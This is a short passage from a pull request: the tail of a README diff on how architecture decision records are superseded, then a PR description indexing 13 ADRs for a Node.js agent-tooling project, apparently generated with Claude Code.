+- Decisions that are fully captured in commit messages or PR bodies
+- Style and formatting choices (those live in linter config)
+
+## Changing a decision
+
+Don't edit old ADRs. Write a new one that supersedes the old one, and mark
+the old one's status as `Superseded by ADR-NNNN`. Decisions are historical
+artifacts.


### PR DESCRIPTION
## Summary
Captures the **why** behind every major architectural decision made since v0.1. Code tells you what. These ADRs tell you why.

## What's new
- `docs/adr/` with 13 ADRs + README
- MADR-lite format: Context, Decision, Consequences (one page each)

## ADR index

| # | Title |
|---|-------|
| 0001 | Monorepo with npm workspaces |
| 0002 | SQLite via `node:sqlite` built-in |
| 0003 | MCP via HTTP/SSE streamable transport |
| 0004 | Temporal worker on host, not Docker |
| 0005 | Shell sandbox; claude-code agents on host |
| 0006 | Env filtering by trust level |
| 0007 | Encrypted file secrets store |
| 0008 | npm Trusted Publishing via OIDC |
| 0009 | Changesets for version management |
| 0010 | Environment-gated release workflow |
| 0011 | Slack via incoming webhooks, not OAuth (rejected) |
| 0012 | Local cron scheduler via node-cron |
| 0013 | Onboarding tutorial + dad-joke example |

## Why
- New contributors can understand the "why" without archaeology through PRs
- Rejected alternatives are captured so we don't re-litigate them
- The ROADMAP (shipped in PR #12) names directions; ADRs explain decisions
- Gives a template for future decisions

## Companion PR
ADR-0012 and ADR-0013 reference the code landing in PR #12 (onboarding walkthrough + cron scheduler). Either PR can land first — the ADRs stand alone and reference existing history.

🤖 Generated with [Claude Code](https://claude.com/claude-code)